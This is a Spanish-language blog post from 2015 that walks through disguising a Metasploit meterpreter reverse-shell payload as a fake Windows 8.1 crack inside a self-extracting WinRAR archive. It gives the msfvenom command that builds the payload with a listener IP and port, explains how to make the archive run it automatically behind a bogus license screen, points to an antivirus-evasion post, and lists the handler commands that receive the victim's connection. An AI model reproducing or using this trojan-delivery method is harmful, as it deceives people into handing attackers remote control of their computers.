viernes, 2 de octubre de 2015

Winrar nuestro viejo aliado de explotación para Metasploit



Saludos mis queridos fieles lectores en esta oportunidad les enseñare un método nuevo, que consiste en fusionar nuestro payload mediante un archivo de winrar de auto ejecución, para obtener la sesión de nuestra victima .

Sin mas que decir, vayamos a la acción :

Escenario de infección:

en esta oportunidad utilizaremos msfvenom para codear nuestra archivo .exe infectado, para ello debemos configurar nuestra IP y el Puerto, de la misma manera que msfconsole.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.179.129 LPORT=8080 -f exe > crack.exe



como vemos nuestro archivo se llama crack.exe, ahora pasaremos a fusionar nuestra ejecutable con winrar.

Luego de ello pasaremos a codificar nuestro archivo para que sea indetectable por los Anti-virus, en este articulo les enseñare como hacerlo.

http://backtrack-omar.blogspot.pe/2015/10/evadiendo-av-codificando-payloads-con.html

Escenario de winrar

En primer lugar vamos a crear la extensión ejecutable  



como vemos la extensión del archivo es crack.sfx.exe, es un archivo auto extraible .
luego de ello iremos a la pestaña "Avanzado".


en mi caso la instalación de nuestro archivo lo añadí en la segunda opción crear carpeta, usted pueden añadir la primera si desean que se cree en C://Archivos de programas, luego mas abajo añadí el nombre de nuestro archivo crack.exe , la cual tiene como función ejecutarse automáticamente. 

Luego de ello vamos a la carpeta "Licencia"


en esta pestaña vamos a escribir o pegar lo que deseamos para que en el momento, la victima ejecute el archivo extraible de winrar le salgan texto sobre la licencia del falso programa, en mi caso fue como un crack para windows 8.1, ustedes pueden poner lo que gusten.

Escenario de msfconsole

lo que haremos ahora sera abrir msfconsole para iniciar nuestro servidor de escucha para obtener la conexión de nuestra victima una ves que ejecute el archivo.

--------------------------------------------------------------------------------------------------------------------------
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.179.129
msf exploit(handler) > set lport 8080
msf exploit(handler) > exploit
--------------------------------------------------------------------------------------------------------------------------



Luego de activar nuestro servidor, pasaremos a añadirle nuestro archivo a la victima.

Escenario de la victima

la victima ejecutara nuestro archivo winrar infectado, como vemos aparece nuestra licencia, entonces el dará aceptar por instinto.  





Luego de ello le aparecerá el cuadro de instalación



La victima pasara a darle en el boton Instalar, donde se ejecutara automáticamente nuestro exploit.

Conexión exitosa

Esto fue todo, espero les aya agradado este post de este humilde servidor, saludos y éxitos.
Happy Hacking!! 


1 comentario:

Datos del Autor


Obra de K. Haring

Hola, mi nombre es omar soy estudiante de Ingenieria de sistemas en Perú. actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.


"Me considero un novato en busca de conocimiento"


Entradas Populares